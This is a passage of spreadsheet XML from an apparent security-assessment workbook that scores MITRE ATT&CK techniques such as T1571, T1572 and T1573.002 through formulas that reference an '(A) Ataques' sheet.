        <v>0</v>
      </c>
      <c r="AQ93" s="4">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CV93,"")</f>
        <v>0</v>
      </c>
      <c r="AR93" s="20">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!$CW93,"")</f>
        <v>0</v>
      </c>
      <c r="AS93" s="287">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($AO93=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT93" s="288">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!CX93,"")</f>
        <v>10</v>
      </c>
      <c r="AU93" s="392">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!CZ93,"")</f>
        <v>4</v>
      </c>
      <c r="AV93" s="4">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!DB93,"")</f>
        <v>2</v>
      </c>
      <c r="AW93" s="20">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",'(A) Ataques'!DC93,"")</f>
        <v>2</v>
      </c>
      <c r="AX93" s="331">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($AT93=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY93" s="469">
        <f>'(A) Ataques'!LU93+'(A) Ataques'!MA93+'(A) Ataques'!MG93+'(A) Ataques'!MM93+'(A) Ataques'!MS93</f>
        <v>2</v>
      </c>
      <c r="AZ93" s="510">
        <f>'(A) Ataques'!LW93+'(A) Ataques'!MC93+'(A) Ataques'!MI93+'(A) Ataques'!MO93+'(A) Ataques'!MU93</f>
        <v>1</v>
      </c>
      <c r="BA93" s="471">
        <f>'(A) Ataques'!LY93+'(A) Ataques'!ME93+'(A) Ataques'!MK93+'(A) Ataques'!MQ93+'(A) Ataques'!MW93</f>
        <v>1</v>
      </c>
      <c r="BB93" s="471">
        <f>'(A) Ataques'!LQ93</f>
        <v>1</v>
      </c>
      <c r="BC93" s="331">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($AY93=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD93" s="469">
        <f>IF('(A) Ataques'!$AP93&lt;&gt;"NO",'(A) Ataques'!LL93,"")</f>
        <v>2</v>
      </c>
      <c r="BE93" s="510">
        <f>IF('(A) Ataques'!$AP93&lt;&gt;"NO",'(A) Ataques'!LM93,"")</f>
        <v>1</v>
      </c>
      <c r="BF93" s="471">
        <f>IF('(A) Ataques'!$AP93&lt;&gt;"NO",'(A) Ataques'!LN93,"")</f>
        <v>1</v>
      </c>
      <c r="BG93" s="471">
        <f>IF('(A) Ataques'!$AP93&lt;&gt;"NO",'(A) Ataques'!LO93,"")</f>
        <v>0</v>
      </c>
      <c r="BH93" s="471">
        <f>IF('(A) Ataques'!$AP93&lt;&gt;"NO",'(A) Ataques'!LS93,"")</f>
        <v>1</v>
      </c>
      <c r="BI93" s="331">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($BD93=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ93" s="469">
        <f>'(A) Ataques'!OL93+'(A) Ataques'!OR93+'(A) Ataques'!OX93+'(A) Ataques'!PD93+'(A) Ataques'!PJ93</f>
        <v>0</v>
      </c>
      <c r="BK93" s="510">
        <f>'(A) Ataques'!ON93+'(A) Ataques'!OT93+'(A) Ataques'!OZ93+'(A) Ataques'!PF93+'(A) Ataques'!PL93</f>
        <v>0</v>
      </c>
      <c r="BL93" s="471">
        <f>'(A) Ataques'!OP93+'(A) Ataques'!OV93+'(A) Ataques'!PB93+'(A) Ataques'!PH93+'(A) Ataques'!PN93</f>
        <v>0</v>
      </c>
      <c r="BM93" s="495">
        <f>'(A) Ataques'!OH93</f>
        <v>0</v>
      </c>
      <c r="BN93" s="331">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($BJ93=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BO93" s="469">
        <f>IF('(A) Ataques'!$AP93&lt;&gt;"NO",'(A) Ataques'!OC93,"")</f>
        <v>0</v>
      </c>
      <c r="BP93" s="510">
        <f>IF('(A) Ataques'!$AP93&lt;&gt;"NO",'(A) Ataques'!OD93,"")</f>
        <v>0</v>
      </c>
      <c r="BQ93" s="471">
        <f>IF('(A) Ataques'!$AP93&lt;&gt;"NO",'(A) Ataques'!OE93,"")</f>
        <v>0</v>
      </c>
      <c r="BR93" s="471">
        <f>IF('(A) Ataques'!$AP93&lt;&gt;"NO",'(A) Ataques'!OF93,"")</f>
        <v>0</v>
      </c>
      <c r="BS93" s="471">
        <f>IF('(A) Ataques'!$AP93&lt;&gt;"NO",'(A) Ataques'!OJ93,"")</f>
        <v>0</v>
      </c>
      <c r="BT93" s="331">
        <f>IF('(A) Ataques'!$AK93&lt;&gt;"NO",IF($BO93=0,0,1),"")</f>
        <v>0</v>
      </c>
    </row>
    <row r="94" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A94" s="79">
        <f t="shared" si="1"/>
        <v>92</v>
      </c>
      <c r="B94" s="4">
        <f>IF('(A) Ataques'!AK94&lt;&gt;"NO",'(A) Ataques'!E94,"")</f>
        <v>62</v>
      </c>
      <c r="C94" s="6" t="str">
        <f>IF('(A) Ataques'!AK94&lt;&gt;"NO",IF('(A) Ataques'!M94="","",'(A) Ataques'!M94),"")</f>
        <v>T1571-SSH</v>
      </c>
      <c r="D94" s="4" t="str">
        <f>IF('(A) Ataques'!AK94&lt;&gt;"NO",'(A) Ataques'!F94,"")</f>
        <v>T1571</v>
      </c>
      <c r="E94" s="286">
        <f>IF('(A) Ataques'!AK94&lt;&gt;"NO",'(A) Ataques'!AQ94,"")</f>
        <v>1</v>
      </c>
      <c r="F94" s="288">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!BB94,"")</f>
        <v>2</v>
      </c>
      <c r="G94" s="392">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!BD94,"")</f>
        <v>1</v>
      </c>
      <c r="H94" s="4">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!BF94,"")</f>
        <v>1</v>
      </c>
      <c r="I94" s="20">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!BG94,"")</f>
        <v>1</v>
      </c>
      <c r="J94" s="530">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($F94=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K94" s="322">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BH94,"")</f>
        <v>0</v>
      </c>
      <c r="L94" s="322">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BJ94,"")</f>
        <v>0</v>
      </c>
      <c r="M94" s="4">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BL94,"")</f>
        <v>0</v>
      </c>
      <c r="N94" s="20">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BM94,"")</f>
        <v>0</v>
      </c>
      <c r="O94" s="532">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($K94=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P94" s="292">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BN94,"")</f>
        <v>2</v>
      </c>
      <c r="Q94" s="322">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BP94,"")</f>
        <v>1</v>
      </c>
      <c r="R94" s="4">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BR94,"")</f>
        <v>1</v>
      </c>
      <c r="S94" s="20">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BS94,"")</f>
        <v>1</v>
      </c>
      <c r="T94" s="530">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($P94=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U94" s="322">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BT94,"")</f>
        <v>3</v>
      </c>
      <c r="V94" s="322">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BV94,"")</f>
        <v>2</v>
      </c>
      <c r="W94" s="4">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BX94,"")</f>
        <v>2</v>
      </c>
      <c r="X94" s="20">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$BY94,"")</f>
        <v>1</v>
      </c>
      <c r="Y94" s="532">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($U94=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z94" s="288">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!BZ94,"")</f>
        <v>4</v>
      </c>
      <c r="AA94" s="392">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!CB94,"")</f>
        <v>2</v>
      </c>
      <c r="AB94" s="4">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!CD94,"")</f>
        <v>2</v>
      </c>
      <c r="AC94" s="20">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!CE94,"")</f>
        <v>1</v>
      </c>
      <c r="AD94" s="331">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF(Z94=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE94" s="322">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CF94,"")</f>
        <v>7</v>
      </c>
      <c r="AF94" s="322">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CH94,"")</f>
        <v>4</v>
      </c>
      <c r="AG94" s="4">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CJ94,"")</f>
        <v>4</v>
      </c>
      <c r="AH94" s="20">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CK94,"")</f>
        <v>1</v>
      </c>
      <c r="AI94" s="287">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($AE94=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ94" s="292">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CL94,"")</f>
        <v>0</v>
      </c>
      <c r="AK94" s="322">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CN94,"")</f>
        <v>0</v>
      </c>
      <c r="AL94" s="4">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CP94,"")</f>
        <v>0</v>
      </c>
      <c r="AM94" s="20">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CQ94,"")</f>
        <v>0</v>
      </c>
      <c r="AN94" s="331">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($AJ94=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO94" s="322">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CR94,"")</f>
        <v>0</v>
      </c>
      <c r="AP94" s="322">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CT94,"")</f>
        <v>0</v>
      </c>
      <c r="AQ94" s="4">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CV94,"")</f>
        <v>0</v>
      </c>
      <c r="AR94" s="20">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!$CW94,"")</f>
        <v>0</v>
      </c>
      <c r="AS94" s="287">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($AO94=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT94" s="288">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!CX94,"")</f>
        <v>2</v>
      </c>
      <c r="AU94" s="392">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!CZ94,"")</f>
        <v>1</v>
      </c>
      <c r="AV94" s="4">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!DB94,"")</f>
        <v>1</v>
      </c>
      <c r="AW94" s="20">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",'(A) Ataques'!DC94,"")</f>
        <v>1</v>
      </c>
      <c r="AX94" s="331">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($AT94=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY94" s="469">
        <f>'(A) Ataques'!LU94+'(A) Ataques'!MA94+'(A) Ataques'!MG94+'(A) Ataques'!MM94+'(A) Ataques'!MS94</f>
        <v>0</v>
      </c>
      <c r="AZ94" s="510">
        <f>'(A) Ataques'!LW94+'(A) Ataques'!MC94+'(A) Ataques'!MI94+'(A) Ataques'!MO94+'(A) Ataques'!MU94</f>
        <v>0</v>
      </c>
      <c r="BA94" s="471">
        <f>'(A) Ataques'!LY94+'(A) Ataques'!ME94+'(A) Ataques'!MK94+'(A) Ataques'!MQ94+'(A) Ataques'!MW94</f>
        <v>0</v>
      </c>
      <c r="BB94" s="471">
        <f>'(A) Ataques'!LQ94</f>
        <v>0</v>
      </c>
      <c r="BC94" s="331">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($AY94=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD94" s="469">
        <f>IF('(A) Ataques'!$AP94&lt;&gt;"NO",'(A) Ataques'!LL94,"")</f>
        <v>2</v>
      </c>
      <c r="BE94" s="510">
        <f>IF('(A) Ataques'!$AP94&lt;&gt;"NO",'(A) Ataques'!LM94,"")</f>
        <v>2</v>
      </c>
      <c r="BF94" s="471">
        <f>IF('(A) Ataques'!$AP94&lt;&gt;"NO",'(A) Ataques'!LN94,"")</f>
        <v>0</v>
      </c>
      <c r="BG94" s="471">
        <f>IF('(A) Ataques'!$AP94&lt;&gt;"NO",'(A) Ataques'!LO94,"")</f>
        <v>2</v>
      </c>
      <c r="BH94" s="471">
        <f>IF('(A) Ataques'!$AP94&lt;&gt;"NO",'(A) Ataques'!LS94,"")</f>
        <v>1</v>
      </c>
      <c r="BI94" s="331">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($BD94=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ94" s="469">
        <f>'(A) Ataques'!OL94+'(A) Ataques'!OR94+'(A) Ataques'!OX94+'(A) Ataques'!PD94+'(A) Ataques'!PJ94</f>
        <v>1</v>
      </c>
      <c r="BK94" s="510">
        <f>'(A) Ataques'!ON94+'(A) Ataques'!OT94+'(A) Ataques'!OZ94+'(A) Ataques'!PF94+'(A) Ataques'!PL94</f>
        <v>1</v>
      </c>
      <c r="BL94" s="471">
        <f>'(A) Ataques'!OP94+'(A) Ataques'!OV94+'(A) Ataques'!PB94+'(A) Ataques'!PH94+'(A) Ataques'!PN94</f>
        <v>1</v>
      </c>
      <c r="BM94" s="495">
        <f>'(A) Ataques'!OH94</f>
        <v>1</v>
      </c>
      <c r="BN94" s="331">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($BJ94=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO94" s="469">
        <f>IF('(A) Ataques'!$AP94&lt;&gt;"NO",'(A) Ataques'!OC94,"")</f>
        <v>1</v>
      </c>
      <c r="BP94" s="510">
        <f>IF('(A) Ataques'!$AP94&lt;&gt;"NO",'(A) Ataques'!OD94,"")</f>
        <v>1</v>
      </c>
      <c r="BQ94" s="471">
        <f>IF('(A) Ataques'!$AP94&lt;&gt;"NO",'(A) Ataques'!OE94,"")</f>
        <v>1</v>
      </c>
      <c r="BR94" s="471">
        <f>IF('(A) Ataques'!$AP94&lt;&gt;"NO",'(A) Ataques'!OF94,"")</f>
        <v>1</v>
      </c>
      <c r="BS94" s="471">
        <f>IF('(A) Ataques'!$AP94&lt;&gt;"NO",'(A) Ataques'!OJ94,"")</f>
        <v>1</v>
      </c>
      <c r="BT94" s="331">
        <f>IF('(A) Ataques'!$AK94&lt;&gt;"NO",IF($BO94=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="95" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A95" s="79">
        <f t="shared" si="1"/>
        <v>93</v>
      </c>
      <c r="B95" s="4">
        <f>IF('(A) Ataques'!AK95&lt;&gt;"NO",'(A) Ataques'!E95,"")</f>
        <v>63</v>
      </c>
      <c r="C95" s="6" t="str">
        <f>IF('(A) Ataques'!AK95&lt;&gt;"NO",IF('(A) Ataques'!M95="","",'(A) Ataques'!M95),"")</f>
        <v>T1572-Protocol_Tunneling</v>
      </c>
      <c r="D95" s="4" t="str">
        <f>IF('(A) Ataques'!AK95&lt;&gt;"NO",'(A) Ataques'!F95,"")</f>
        <v>T1572</v>
      </c>
      <c r="E95" s="286">
        <f>IF('(A) Ataques'!AK95&lt;&gt;"NO",'(A) Ataques'!AQ95,"")</f>
        <v>3</v>
      </c>
      <c r="F95" s="288">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!BB95,"")</f>
        <v>6</v>
      </c>
      <c r="G95" s="392">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!BD95,"")</f>
        <v>2</v>
      </c>
      <c r="H95" s="4">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!BF95,"")</f>
        <v>1</v>
      </c>
      <c r="I95" s="20">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!BG95,"")</f>
        <v>2</v>
      </c>
      <c r="J95" s="530">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($F95=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K95" s="322">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BH95,"")</f>
        <v>1</v>
      </c>
      <c r="L95" s="322">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BJ95,"")</f>
        <v>1</v>
      </c>
      <c r="M95" s="4">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BL95,"")</f>
        <v>1</v>
      </c>
      <c r="N95" s="20">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BM95,"")</f>
        <v>1</v>
      </c>
      <c r="O95" s="532">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($K95=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P95" s="292">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BN95,"")</f>
        <v>7</v>
      </c>
      <c r="Q95" s="322">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BP95,"")</f>
        <v>3</v>
      </c>
      <c r="R95" s="4">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BR95,"")</f>
        <v>2</v>
      </c>
      <c r="S95" s="20">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BS95,"")</f>
        <v>2</v>
      </c>
      <c r="T95" s="530">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($P95=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U95" s="322">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BT95,"")</f>
        <v>7</v>
      </c>
      <c r="V95" s="322">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BV95,"")</f>
        <v>3</v>
      </c>
      <c r="W95" s="4">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BX95,"")</f>
        <v>2</v>
      </c>
      <c r="X95" s="20">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$BY95,"")</f>
        <v>2</v>
      </c>
      <c r="Y95" s="532">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($U95=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z95" s="288">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!BZ95,"")</f>
        <v>6</v>
      </c>
      <c r="AA95" s="392">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!CB95,"")</f>
        <v>4</v>
      </c>
      <c r="AB95" s="4">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!CD95,"")</f>
        <v>4</v>
      </c>
      <c r="AC95" s="20">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!CE95,"")</f>
        <v>3</v>
      </c>
      <c r="AD95" s="331">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF(Z95=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE95" s="322">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CF95,"")</f>
        <v>13</v>
      </c>
      <c r="AF95" s="322">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CH95,"")</f>
        <v>7</v>
      </c>
      <c r="AG95" s="4">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CJ95,"")</f>
        <v>6</v>
      </c>
      <c r="AH95" s="20">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CK95,"")</f>
        <v>3</v>
      </c>
      <c r="AI95" s="287">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($AE95=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ95" s="292">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CL95,"")</f>
        <v>0</v>
      </c>
      <c r="AK95" s="322">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CN95,"")</f>
        <v>0</v>
      </c>
      <c r="AL95" s="4">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CP95,"")</f>
        <v>0</v>
      </c>
      <c r="AM95" s="20">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CQ95,"")</f>
        <v>0</v>
      </c>
      <c r="AN95" s="331">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($AJ95=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO95" s="322">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CR95,"")</f>
        <v>1</v>
      </c>
      <c r="AP95" s="322">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CT95,"")</f>
        <v>1</v>
      </c>
      <c r="AQ95" s="4">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CV95,"")</f>
        <v>1</v>
      </c>
      <c r="AR95" s="20">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!$CW95,"")</f>
        <v>1</v>
      </c>
      <c r="AS95" s="287">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($AO95=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT95" s="288">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!CX95,"")</f>
        <v>8</v>
      </c>
      <c r="AU95" s="392">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!CZ95,"")</f>
        <v>4</v>
      </c>
      <c r="AV95" s="4">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!DB95,"")</f>
        <v>3</v>
      </c>
      <c r="AW95" s="20">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",'(A) Ataques'!DC95,"")</f>
        <v>2</v>
      </c>
      <c r="AX95" s="331">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($AT95=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY95" s="469">
        <f>'(A) Ataques'!LU95+'(A) Ataques'!MA95+'(A) Ataques'!MG95+'(A) Ataques'!MM95+'(A) Ataques'!MS95</f>
        <v>4</v>
      </c>
      <c r="AZ95" s="510">
        <f>'(A) Ataques'!LW95+'(A) Ataques'!MC95+'(A) Ataques'!MI95+'(A) Ataques'!MO95+'(A) Ataques'!MU95</f>
        <v>3</v>
      </c>
      <c r="BA95" s="471">
        <f>'(A) Ataques'!LY95+'(A) Ataques'!ME95+'(A) Ataques'!MK95+'(A) Ataques'!MQ95+'(A) Ataques'!MW95</f>
        <v>3</v>
      </c>
      <c r="BB95" s="471">
        <f>'(A) Ataques'!LQ95</f>
        <v>2</v>
      </c>
      <c r="BC95" s="331">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($AY95=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD95" s="469">
        <f>IF('(A) Ataques'!$AP95&lt;&gt;"NO",'(A) Ataques'!LL95,"")</f>
        <v>6</v>
      </c>
      <c r="BE95" s="510">
        <f>IF('(A) Ataques'!$AP95&lt;&gt;"NO",'(A) Ataques'!LM95,"")</f>
        <v>5</v>
      </c>
      <c r="BF95" s="471">
        <f>IF('(A) Ataques'!$AP95&lt;&gt;"NO",'(A) Ataques'!LN95,"")</f>
        <v>3</v>
      </c>
      <c r="BG95" s="471">
        <f>IF('(A) Ataques'!$AP95&lt;&gt;"NO",'(A) Ataques'!LO95,"")</f>
        <v>2</v>
      </c>
      <c r="BH95" s="471">
        <f>IF('(A) Ataques'!$AP95&lt;&gt;"NO",'(A) Ataques'!LS95,"")</f>
        <v>2</v>
      </c>
      <c r="BI95" s="331">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($BD95=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ95" s="469">
        <f>'(A) Ataques'!OL95+'(A) Ataques'!OR95+'(A) Ataques'!OX95+'(A) Ataques'!PD95+'(A) Ataques'!PJ95</f>
        <v>1</v>
      </c>
      <c r="BK95" s="510">
        <f>'(A) Ataques'!ON95+'(A) Ataques'!OT95+'(A) Ataques'!OZ95+'(A) Ataques'!PF95+'(A) Ataques'!PL95</f>
        <v>1</v>
      </c>
      <c r="BL95" s="471">
        <f>'(A) Ataques'!OP95+'(A) Ataques'!OV95+'(A) Ataques'!PB95+'(A) Ataques'!PH95+'(A) Ataques'!PN95</f>
        <v>1</v>
      </c>
      <c r="BM95" s="495">
        <f>'(A) Ataques'!OH95</f>
        <v>1</v>
      </c>
      <c r="BN95" s="331">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($BJ95=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO95" s="469">
        <f>IF('(A) Ataques'!$AP95&lt;&gt;"NO",'(A) Ataques'!OC95,"")</f>
        <v>1</v>
      </c>
      <c r="BP95" s="510">
        <f>IF('(A) Ataques'!$AP95&lt;&gt;"NO",'(A) Ataques'!OD95,"")</f>
        <v>1</v>
      </c>
      <c r="BQ95" s="471">
        <f>IF('(A) Ataques'!$AP95&lt;&gt;"NO",'(A) Ataques'!OE95,"")</f>
        <v>1</v>
      </c>
      <c r="BR95" s="471">
        <f>IF('(A) Ataques'!$AP95&lt;&gt;"NO",'(A) Ataques'!OF95,"")</f>
        <v>1</v>
      </c>
      <c r="BS95" s="471">
        <f>IF('(A) Ataques'!$AP95&lt;&gt;"NO",'(A) Ataques'!OJ95,"")</f>
        <v>1</v>
      </c>
      <c r="BT95" s="331">
        <f>IF('(A) Ataques'!$AK95&lt;&gt;"NO",IF($BO95=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="96" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A96" s="79">
        <f t="shared" si="1"/>
        <v>94</v>
      </c>
      <c r="B96" s="4">
        <f>IF('(A) Ataques'!AK96&lt;&gt;"NO",'(A) Ataques'!E96,"")</f>
        <v>64</v>
      </c>
      <c r="C96" s="6" t="str">
        <f>IF('(A) Ataques'!AK96&lt;&gt;"NO",IF('(A) Ataques'!M96="","",'(A) Ataques'!M96),"")</f>
        <v>T1573.002-AsymetricCryptography</v>
      </c>
      <c r="D96" s="4" t="str">
        <f>IF('(A) Ataques'!AK96&lt;&gt;"NO",'(A) Ataques'!F96,"")</f>
        <v>T1573</v>
      </c>
      <c r="E96" s="286">
        <f>IF('(A) Ataques'!AK96&lt;&gt;"NO",'(A) Ataques'!AQ96,"")</f>
        <v>2</v>
      </c>
      <c r="F96" s="288">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!BB96,"")</f>
        <v>3</v>
      </c>
      <c r="G96" s="392">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!BD96,"")</f>
        <v>3</v>
      </c>
      <c r="H96" s="4">
        <f>IF('(A) Ataques'!$AK96&lt;&gt;"NO",'(A) Ataques'!BF96,"")</f>
        <v>3</v>
      </c>
      <c r="I96" s="20">
